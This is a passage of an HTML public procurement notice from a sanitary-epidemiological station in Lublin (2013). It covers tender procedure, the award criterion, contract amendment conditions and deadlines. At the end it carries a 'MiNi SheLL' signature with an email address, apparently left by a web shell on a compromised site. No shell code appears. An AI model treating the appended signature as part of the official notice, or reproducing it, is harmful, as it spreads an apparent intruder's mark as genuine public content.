7)	Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumenty składające się na ofertę podpisuje osoba nieuprawniona do reprezentowania wykonawcy (zgodnie z odpisem z Krajowego Rejestru Sądowego lub z zaświadczeniem o wpisie do ewidencji działalności gospodarczej). Pełnomocnictwo powinno być złożone w oryginale lub w formie kopii poświadczonej za zgodność z oryginałem przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Przewiduje się możliwość zmiany terminów realizacji  określonych w niniejszej umowy a także innych jej postanowień w następujących przypadkach:
 a)	działania siły wyższej, uniemożliwiającej wykonanie umowy w terminie,
 b)	wystąpienia niezależnego od Wykonawcy przedłużania się pozyskiwania uzgodnień i warunków do projektowania od dysponentów mediów, ZUDP i innych właściwych organów czy instytucji oraz przedłużanie się pozyskiwania wszelkich decyzji niezbędnych do otrzymania koniecznych uzgodnień i pozwolenia na budowę, trwającego ponad dwa miesiące od daty złożenia poszczególnych opracowań lub dokumentów do uzgodnienia we właściwej instytucji,
 c)	braku zgód właścicieli gruntów objętych inwestycją, na dysponowanie gruntem dla potrzeb inwestycji,
 d)	realizacji w drodze odrębnej umowy  prac powiązanych z przedmiotem niniejszej umowy, powodującego konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań,
 e)	gdy zachowanie pierwotnego terminu nie leży w interesie Zamawiającego.
 f)	Zmiana stawki VAT i kwoty podatku VAT oraz zmiana wynagrodzenia brutto.
 g)	Zmniejszenie zakresu przedmiotu umowy, gdy wykonanie pierwotnego zakresu nie leży w interesie publicznym lub zamawiającego, a także  w przypadku wystąpienia okoliczności, o których mowa w § 2 ust. 10, z jednoczesnym proporcjonalnym zmniejszeniem wynagrodzenia oraz w razie potrzeby, ze zmiana terminu realizacji przedmiotu umowy.
 2.	Termin realizacji przedmiotu umowy zostanie zmieniony w przypadku wystąpienia okoliczności przewidzianych w:
 a)	pkt 1 ppkt a) o okres niezbędny do usunięcia skutków działania siły wyższej,
 b)	pkt 1 ppkt b) o najdłuższy okres czasu przez jaki okoliczności te wystąpiły,
 c)	pkt 1 ppkt c) na okres niezbędny do pozyskania prawa do dysponowania odpowiednim gruntem
 d)	pkt 1 ppkt d) o okres czasu niezbędny do wykonania prac powiązanych z przedmiotem niniejszej umowy, realizowanych w drodze odrębnej umowy
 e)	pkt 1 ppkt f) o okres umożliwiający Zamawiającemu osiągnięcie korzyści, stanowiących podstawę zmiany terminu realizacji.
 f)	pkt. 1 ppkt g) - stawka i kwota podatku VAT oraz wynagrodzenie brutto ulegają zmianie odpowiednio do przepisów prawa wprowadzającego zmianę, kwota netto nie ulega zmianie.
 g)	pkt. 2 ppkt. h) zmniejszenie zakresu przedmiotu umowy w granicach uzasadnionego interesu publicznego lub interesu Zamawiającego w zakresie wynikającym z ograniczenia środków, które miały być przeznaczone na dofinansowanie przedmiotu umowy, z jednoczesnym proporcjonalnym do zmniejszonego zakresu zamówienia (do wartości zaniechanych prac projektowych i nadzorów), zmniejszeniem wynagrodzenia określonego kwotą ryczałtową w § 6ust. 1; wysokość ostatecznego, zmniejszonego wynagrodzenia zostanie ustalona na podstawie wyliczenia procentowego udziału zmniejszonego zakresu zamówienia w pierwotnie przyjętym zakresie, co zostanie potwierdzone przez obie strony umowy stosownym protokołem.
 3.	Przewiduje się możliwość zmniejszenia zakresu przedmiotu zamówienia, gdy wykonanie pierwotnego zakresu nie leży w interesie Zamawiającego, z jednoczesnym proporcjonalnym zmniejszeniem wynagrodzenia oraz w razie potrzeby, ze zmianą terminu realizacji zamówienia. Wysokość ostatecznego, zmniejszonego wynagrodzenia, zostanie ustalona na podstawie protokołu zatwierdzonego przez obie strony umowy, na podstawie wyliczenia procentowego udziału zmniejszonego 	zakresu zamówienia w pierwotnie przyjętym zakresie.
 4.	Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron, wyrażoną w formie pisemnej, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.psselublin.bip.org.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowa Stacja Sanitarno-Epidemiologiczna w Lublinie, 20-029 Lublin, ul. Uniwersytecka 12..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2013 godzina 14:00, miejsce: Powiatowa Stacja Sanitarno-Epidemiologiczna w Lublinie, 20-029 Lublin, ul. Uniwersytecka 12, sekretariat zamawiającego (I piętro, pokój nr 13), w godzinach od 7:30 - 15:05.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com